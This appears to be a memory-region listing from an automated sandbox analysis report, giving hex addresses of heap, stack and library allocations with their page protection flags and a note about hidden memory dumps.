|
||
5596000
|
trusted library allocation
|
page read and write
|
||
787000
|
heap
|
page read and write
|
||
3779000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
23D0000
|
trusted library allocation
|
page execute and read and write
|
||
7760000
|
trusted library allocation
|
page read and write
|
||
2AC5BD8D000
|
heap
|
page read and write
|
||
554B000
|
trusted library allocation
|
page read and write
|
||
73D00000
|
unkown
|
page readonly
|
||
4ED9000
|
trusted library allocation
|
page read and write
|
||
1A57AAF7000
|
heap
|
page read and write
|
||
55B1000
|
trusted library allocation
|
page read and write
|
||
53A8000
|
trusted library allocation
|
page read and write
|
||
7570000
|
trusted library allocation
|
page read and write
|
||
5850000
|
trusted library allocation
|
page read and write
|
||
2AC5CFDE000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A578DD7000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
1A57D10C000
|
heap
|
page read and write
|
||
3324000
|
trusted library allocation
|
page read and write
|
||
2720000
|
heap
|
page read and write
|
||
1A57CE49000
|
heap
|
page read and write
|
||
5650000
|
trusted library allocation
|
page execute and read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
4E4B000
|
trusted library allocation
|
page read and write
|
||
5409000
|
trusted library allocation
|
page read and write
|
||
1A57C4F1000
|
heap
|
page read and write
|
||
2749000
|
heap
|
page read and write
|
||
2799000
|
trusted library allocation
|
page read and write
|
||
4F30000
|
trusted library allocation
|
page read and write
|
||
1A57C68D000
|
heap
|
page read and write
|
||
5285000
|
trusted library allocation
|
page read and write
|
||
1A57D0D6000
|
heap
|
page read and write
|
||
540B000
|
trusted library allocation
|
page read and write
|
||
2AC5D093000
|
heap
|
page read and write
|
||
1A57C593000
|
heap
|
page read and write
|
||
5122000
|
trusted library allocation
|
page read and write
|
||
607E000
|
stack
|
page read and write
|
||
227FF89C000
|
heap
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
7F200000
|
trusted library allocation
|
page execute and read and write
|
||
565D000
|
trusted library allocation
|
page read and write
|
||
1A57AD1A000
|
heap
|
page read and write
|
||
4E47000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5CAC1000
|
heap
|
page read and write
|
||
9CB0000
|
trusted library allocation
|
page execute and read and write
|
||
A0F0000
|
heap
|
page read and write
|
||
8970000
|
trusted library allocation
|
page read and write
|
||
4F35000
|
trusted library allocation
|
page read and write
|
||
6F96000
|
heap
|
page read and write
|
||
227FFAC0000
|
heap
|
page read and write
|
||
7260000
|
trusted library allocation
|
page read and write
|
||
375A000
|
trusted library allocation
|
page read and write
|
||
703A000
|
heap
|
page read and write
|
||
1A57D0AB000
|
heap
|
page read and write
|
||
527F000
|
trusted library allocation
|
page read and write
|
||
540D000
|
trusted library allocation
|
page read and write
|
||
5657000
|
trusted library allocation
|
page read and write
|
||
7461000
|
heap
|
page read and write
|
||
529C000
|
trusted library allocation
|
page read and write
|
||
2AC5AA53000
|
heap
|
page read and write
|
||
57C0000
|
trusted library allocation
|
page execute and read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
1A57CB32000
|
heap
|
page read and write
|
||
4D51000
|
trusted library allocation
|
page read and write
|
||
1502000
|
trusted library allocation
|
page read and write
|
||
1A57AB17000
|
heap
|
page read and write
|
||
5343000
|
trusted library allocation
|
page read and write
|
||
227FF6E0000
|
heap
|
page read and write
|
||
1A578CA8000
|
heap
|
page read and write
|
||
9CFD000
|
trusted library allocation
|
page read and write
|
||
732D000
|
stack
|
page read and write
|
||
1A57D08F000
|
heap
|
page read and write
|
||
564D000
|
trusted library allocation
|
page read and write
|
||
53BA000
|
trusted library allocation
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
227FF87B000
|
heap
|
page read and write
|
||
517F000
|
trusted library allocation
|
page read and write
|
||
1A578DC1000
|
heap
|
page read and write
|
||
2AC5D07B000
|
heap
|
page read and write
|
||
529E000
|
trusted library allocation
|
page read and write
|
||
6E72000
|
heap
|
page read and write
|
||
7071000
|
trusted library allocation
|
page read and write
|
||
1A57D12C000
|
heap
|
page read and write
|
||
4FB7000
|
heap
|
page read and write
|
||
2AC5BD8E000
|
heap
|
page read and write
|
||
7D5E000
|
stack
|
page read and write
|
||
336E000
|
trusted library allocation
|
page read and write
|
||
2AC5AA30000
|
heap
|
page read and write
|
||
1A57C692000
|
heap
|
page read and write
|
||
9A8E000
|
heap
|
page read and write
|
||
2A85000
|
trusted library allocation
|
page execute and read and write
|
||
5AA0000
|
trusted library allocation
|
page execute and read and write
|
||
279B000
|
trusted library allocation
|
page read and write
|
||
54D2000
|
trusted library allocation
|
page read and write
|
||
2AC5C61C000
|
heap
|
page read and write
|
||
5F21000
|
trusted library allocation
|
page read and write
|
||
5176000
|
trusted library allocation
|
page read and write
|
||
4F54000
|
trusted library allocation
|
page read and write
|
||
23AE000
|
stack
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
7578000
|
trusted library allocation
|
page read and write
|
||
546F000
|
stack
|
page read and write
|
||
1A57AAF9000
|
heap
|
page read and write
|
||
532C000
|
trusted library allocation
|
page read and write
|
||
54D0000
|
trusted library allocation
|
page read and write
|
||
2AC5C86F000
|
heap
|
page read and write
|
||
7E05000
|
trusted library allocation
|
page read and write
|
||
2AC5D0E2000
|
heap
|
page read and write
|
||
4E7F000
|
trusted library allocation
|
page read and write
|
||
3753000
|
trusted library allocation
|
page read and write
|
||
5196000
|
trusted library allocation
|
page read and write
|
||
6D9E000
|
stack
|
page read and write
|
||
1A57D0CA000
|
heap
|
page read and write
|
||
2AC5C6BA000
|
heap
|
page read and write
|
||
4DCC000
|
trusted library allocation
|
page read and write
|
||
53FD000
|
trusted library allocation
|
page read and write
|
||
2AC5AC2E000
|
heap
|
page read and write
|
||
2AC5BD8D000
|
heap
|
page read and write
|
||
559A000
|
trusted library allocation
|
page read and write
|
||
1A57D049000
|
heap
|
page read and write
|
||
54DA000
|
trusted library allocation
|
page read and write
|
||
7551000
|
trusted library allocation
|
page read and write
|
||
35AE000
|
trusted library allocation
|
page read and write
|
||
5640000
|
trusted library allocation
|
page read and write
|
||
2A7C000
|
trusted library allocation
|
page read and write
|
||
5656000
|
trusted library allocation
|
page read and write
|
||
2AC5C770000
|
heap
|
page read and write
|
||
4D7F000
|
trusted library allocation
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
1A57D0F1000
|
heap
|
page read and write
|
||
3E1000
|
unkown
|
page write copy
|
||
658A000
|
heap
|
page read and write
|
||
1A57BFF9000
|
heap
|
page read and write
|
||
5098000
|
trusted library allocation
|
page read and write
|
||
7200000
|
trusted library allocation
|
page read and write
|
||
5D99000
|
trusted library allocation
|
page read and write
|
||
1A57AAA3000
|
heap
|
page read and write
|
||
5317000
|
trusted library allocation
|
page read and write
|
||
2776000
|
trusted library allocation
|
page read and write
|
||
4C20000
|
trusted library allocation
|
page read and write
|
||
4EBC000
|
trusted library allocation
|
page read and write
|
||
5311000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
trusted library allocation
|
page read and write
|
||
1A57AAC7000
|
heap
|
page read and write
|
||
6A6F000
|
stack
|
page read and write
|
||
5566000
|
trusted library allocation
|
page read and write
|
||
6386000
|
trusted library allocation
|
page read and write
|
||
2AC5B173000
|
heap
|
page read and write
|
||
5B39000
|
heap
|
page read and write
|
||
3705000
|
trusted library allocation
|
page read and write
|
||
53F2000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
1A57CE4A000
|
heap
|
page read and write
|
||
2AC5AC2E000
|
heap
|
page read and write
|
||
2AC5C502000
|
heap
|
page read and write
|
||
2AC5A6E0000
|
heap
|
page read and write
|
||
72D0000
|
heap
|
page read and write
|
||
2AC5AA47000
|
heap
|
page read and write
|
||
52B5000
|
trusted library allocation
|
page read and write
|
||
1A57AAD0000
|
heap
|
page read and write
|
||
2AC5ABC3000
|
heap
|
page read and write
|
||
50D0000
|
trusted library allocation
|
page read and write
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
4EBC000
|
stack
|
page read and write
|
||
4DB9000
|
trusted library allocation
|
page read and write
|
||
5D71000
|
trusted library allocation
|
page read and write
|
||
5313000
|
trusted library allocation
|
page read and write
|
||
4D50000
|
heap
|
page execute and read and write
|
||
2AC58BFA000
|
heap
|
page read and write
|
||
1500000
|
trusted library allocation
|
page read and write
|
||
771E000
|
stack
|
page read and write
|
||
4DE7000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
5632000
|
trusted library allocation
|
page read and write
|
||
2AC5AA96000
|
heap
|
page read and write
|
||
638F000
|
stack
|
page read and write
|
||
14E0000
|
trusted library allocation
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
2AC5B17E000
|
heap
|
page read and write
|
||
73D1D000
|
unkown
|
page read and write
|
||
2AC58BAA000
|
heap
|
page read and write
|
||
5379000
|
trusted library allocation
|
page read and write
|
||
5DDC000
|
trusted library allocation
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
1A57C744000
|
heap
|
page read and write
|
||
2A50000
|
trusted library allocation
|
page read and write
|
||
664E000
|
stack
|
page read and write
|
||
4F1E000
|
trusted library allocation
|
page read and write
|
||
2AC5C610000
|
heap
|
page read and write
|
||
2AC58B5F000
|
heap
|
page read and write
|
||
1A57AAA1000
|
heap
|
page read and write
|
||
6800000
|
heap
|
page read and write
|
||
4EA9000
|
trusted library allocation
|
page read and write
|
||
27C4000
|
trusted library allocation
|
page read and write
|
||
6AB000
|
trusted library allocation
|
page execute and read and write
|
||
1517000
|
trusted library allocation
|
page execute and read and write
|
||
1A57D09B000
|
heap
|
page read and write
|
||
2AC5D0E2000
|
heap
|
page read and write
|
||
5549000
|
trusted library allocation
|
page read and write
|
||
2AC58BD3000
|
heap
|
page read and write
|
||
2AC5C672000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
4F39000
|
trusted library allocation
|
page read and write
|
||
9CCA000
|
trusted library allocation
|
page read and write
|
||
4E26000
|
trusted library allocation
|
page read and write
|
||
227FF8E9000
|
heap
|
page read and write
|
||
4E96000
|
trusted library allocation
|
page read and write
|
||
1A57C58E000
|
heap
|
page read and write
|
||
4ED7000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
343E000
|
trusted library allocation
|
page read and write
|
||
2AC5CCC6000
|
heap
|
page read and write
|
||
14E3000
|
trusted library allocation
|
page execute and read and write
|
||
4E3F000
|
trusted library allocation
|
page read and write
|
||
72E0000
|
trusted library allocation
|
page read and write
|
||
1A57AAB3000
|
heap
|
page read and write
|
||
4C2E000
|
stack
|
page read and write
|
||
8810000
|
trusted library allocation
|
page read and write
|
||
1A57B6D6000
|
heap
|
page read and write
|
||
8860000
|
trusted library allocation
|
page execute and read and write
|
||
1A57AAEB000
|
heap
|
page read and write
|
||
1A57CE38000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
4DDF000
|
trusted library allocation
|
page read and write
|
||
A4F000
|
stack
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5AA73000
|
heap
|
page read and write
|
||
2AC5CDD8000
|
heap
|
page read and write
|
||
4C10000
|
trusted library allocation
|
page read and write
|
||
4DC6000
|
trusted library allocation
|
page read and write
|
||
680000
|
trusted library allocation
|
page read and write
|
||
2AC58D8C000
|
heap
|
page read and write
|
||
11A8000
|
heap
|
page read and write
|
||
533D000
|
trusted library allocation
|
page read and write
|
||
2AC5C51D000
|
heap
|
page read and write
|
||
1A57CAE1000
|
heap
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
F16CCFB000
|
stack
|
page read and write
|
||
5690000
|
trusted library allocation
|
page read and write
|
||
4E33000
|
trusted library allocation
|
page read and write
|
||
2AC58B00000
|
heap
|
page read and write
|
||
5594000
|
trusted library allocation
|
page read and write
|
||
4F7D000
|
heap
|
page read and write
|
||
2F29000
|
trusted library allocation
|
page read and write
|
||
1A57CAE0000
|
heap
|
page read and write
|
||
839B000
|
trusted library allocation
|
page read and write
|
||
1A57C9BB000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
1A57D083000
|
heap
|
page read and write
|
||
4E67000
|
trusted library allocation
|
page read and write
|
||
1A57AB06000
|
heap
|
page read and write
|
||
3740000
|
trusted library allocation
|
page read and write
|
||
2AC5CA53000
|
heap
|
page read and write
|
||
2AC58BA8000
|
heap
|
page read and write
|
||
7FFB23B25000
|
unkown
|
page readonly
|
||
4790000
|
heap
|
page execute and read and write
|
||
560D000
|
trusted library allocation
|
page read and write
|
||
5388000
|
trusted library allocation
|
page read and write
|
||
4D9A000
|
trusted library allocation
|
page read and write
|
||
1A578D68000
|
heap
|
page read and write
|
||
A90000
|
heap
|
page execute and read and write
|
||
1A578DFB000
|
heap
|
page read and write
|
||
42C0000
|
trusted library allocation
|
page read and write
|
||
559C000
|
trusted library allocation
|
page read and write
|
||
61C0000
|
trusted library allocation
|
page read and write
|
||
1A57C9DE000
|
heap
|
page read and write
|
||
2AC5C66E000
|
heap
|
page read and write
|
||
351000
|
unkown
|
page read and write
|
||
56C8000
|
trusted library allocation
|
page read and write
|
||
1A578D94000
|
heap
|
page read and write
|
||
8348000
|
trusted library allocation
|
page read and write
|
||
2AC58BA3000
|
heap
|
page read and write
|
||
2AC5CDC7000
|
heap
|
page read and write
|
||
6A5000
|
trusted library allocation
|
page execute and read and write
|
||
2A1B000
|
trusted library allocation
|
page read and write
|
||
82D0000
|
trusted library allocation
|
page read and write
|
||
2AC5AA60000
|
heap
|
page read and write
|
||
563C000
|
trusted library allocation
|
page read and write
|
||
5545000
|
trusted library allocation
|
page read and write
|
||
49F3000
|
trusted library allocation
|
page read and write
|
||
5187000
|
trusted library allocation
|
page read and write
|
||
3314000
|
trusted library allocation
|
page read and write
|
||
2AC5B64E000
|
heap
|
page read and write
|
||
1A57BDF0000
|
heap
|
page read and write
|
||
61F5000
|
trusted library allocation
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
563A000
|
trusted library allocation
|
page read and write
|
||
4EEA000
|
trusted library allocation
|
page read and write
|
||
1A57C68D000
|
heap
|
page read and write
|
||
55D4000
|
trusted library allocation
|
page read and write
|
||
5368000
|
trusted library allocation
|
page read and write
|
||
7FFB1C2E1000
|
unkown
|
page execute read
|
||
73D16000
|
unkown
|
page readonly
|
||
2AC5CFF3000
|
heap
|
page read and write
|
||
1A57CB3A000
|
heap
|
page read and write
|
||
4D45000
|
trusted library allocation
|
page read and write
|
||
560A000
|
trusted library allocation
|
page read and write
|
||
83D0000
|
trusted library allocation
|
page read and write
|
||
1A57C4E1000
|
heap
|
page read and write
|
||
7DA0000
|
heap
|
page read and write
|
||
63F0000
|
trusted library allocation
|
page read and write
|
||
54FE000
|
trusted library allocation
|
page read and write
|
||
1A57C58F000
|
heap
|
page read and write
|
||
533B000
|
trusted library allocation
|
page read and write
|
||
61E6000
|
trusted library allocation
|
page read and write
|
||
5600000
|
trusted library allocation
|
page execute and read and write
|
||
36CC000
|
trusted library allocation
|
page read and write
|
||
2AC5D026000
|
heap
|
page read and write
|
||
1A57AAF7000
|
heap
|
page read and write
|
||
1A57D0F4000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
54F5000
|
trusted library allocation
|
page read and write
|
||
2CCE000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5AC20000
|
heap
|
page read and write
|
||
53D9000
|
trusted library allocation
|
page read and write
|
||
6016000
|
trusted library allocation
|
page read and write
|
||
1A57C6E1000
|
heap
|
page read and write
|
||
512A000
|
trusted library allocation
|
page read and write
|
||
6580000
|
heap
|
page read and write
|
||
1A578DAB000
|
heap
|
page read and write
|
||
2E8E000
|
stack
|
page read and write
|
||
A0E0000
|
trusted library allocation
|
page execute and read and write
|
||
563E000
|
trusted library allocation
|
page read and write
|
||
52E1000
|
trusted library allocation
|
page read and write
|
||
4F09000
|
trusted library allocation
|
page read and write
|
||
89A0000
|
trusted library allocation
|
page read and write
|
||
4DC8000
|
trusted library allocation
|
page read and write
|
||
2AC5CDC7000
|
heap
|
page read and write
|
||
5796000
|
trusted library allocation
|
page read and write
|
||
6F7A000
|
stack
|
page read and write
|
||
2850000
|
trusted library section
|
page read and write
|
||
55BC000
|
trusted library allocation
|
page read and write
|
||
2A35000
|
trusted library allocation
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
784000
|
heap
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
54A6000
|
trusted library allocation
|
page read and write
|
||
13DE000
|
stack
|
page read and write
|
||
53A5000
|
trusted library allocation
|
page read and write
|
||
2AC5CA70000
|
heap
|
page read and write
|
||
532E000
|
trusted library allocation
|
page read and write
|
||
5362000
|
trusted library allocation
|
page read and write
|
||
50BB000
|
trusted library allocation
|
page read and write
|
||
1A57BDF1000
|
heap
|
page read and write
|
||
2AC5ACA0000
|
heap
|
page read and write
|
||
55CC000
|
trusted library allocation
|
page read and write
|
||
5547000
|
trusted library allocation
|
page read and write
|
||
370B000
|
trusted library allocation
|
page read and write
|
||
54A8000
|
trusted library allocation
|
page read and write
|
||
4E0F000
|
trusted library allocation
|
page read and write
|
||
2F2D000
|
trusted library allocation
|
page execute and read and write
|
||
36FE000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
1A57AAF7000
|
heap
|
page read and write
|
||
1A57D0CA000
|
heap
|
page read and write
|
||
707E000
|
stack
|
page read and write
|
||
1A578DFE000
|
heap
|
page read and write
|
||
26A8000
|
stack
|
page read and write
|
||
2F45000
|
trusted library allocation
|
page execute and read and write
|
||
5504000
|
trusted library allocation
|
page read and write
|
||
2AC58D8B000
|
heap
|
page read and write
|
||
2F5E000
|
trusted library allocation
|
page read and write
|
||
1A578D4D000
|
heap
|
page read and write
|
||
2AC5D093000
|
heap
|
page read and write
|
||
277E000
|
heap
|
page read and write
|
||
6690000
|
trusted library allocation
|
page execute and read and write
|
||
2AC58BFE000
|
heap
|
page read and write
|
||
2AC5C61D000
|
heap
|
page read and write
|
||
5A8E000
|
stack
|
page read and write
|
||
2AC58D8E000
|
heap
|
page read and write
|
||
2EF0000
|
trusted library section
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
541C000
|
trusted library allocation
|
page read and write
|
||
5055000
|
trusted library allocation
|
page read and write
|
||
341000
|
unkown
|
page execute read
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
2AC5CFF7000
|
heap
|
page read and write
|
||
8F8D000
|
trusted library allocation
|
page read and write
|
||
5ACC000
|
trusted library allocation
|
page read and write
|
||
8840000
|
trusted library allocation
|
page read and write
|
||
4E4D000
|
trusted library allocation
|
page read and write
|
||
1A57AB2F000
|
heap
|
page read and write
|
||
4D43000
|
trusted library allocation
|
page read and write
|
||
515E000
|
trusted library allocation
|
page read and write
|
||
4E9A000
|
trusted library allocation
|
page read and write
|
||
538E000
|
trusted library allocation
|
page read and write
|
||
5634000
|
trusted library allocation
|
page read and write
|
||
9CA0000
|
trusted library allocation
|
page execute and read and write
|
||
5513000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
There are 1927 hidden memdumps, click here to show them.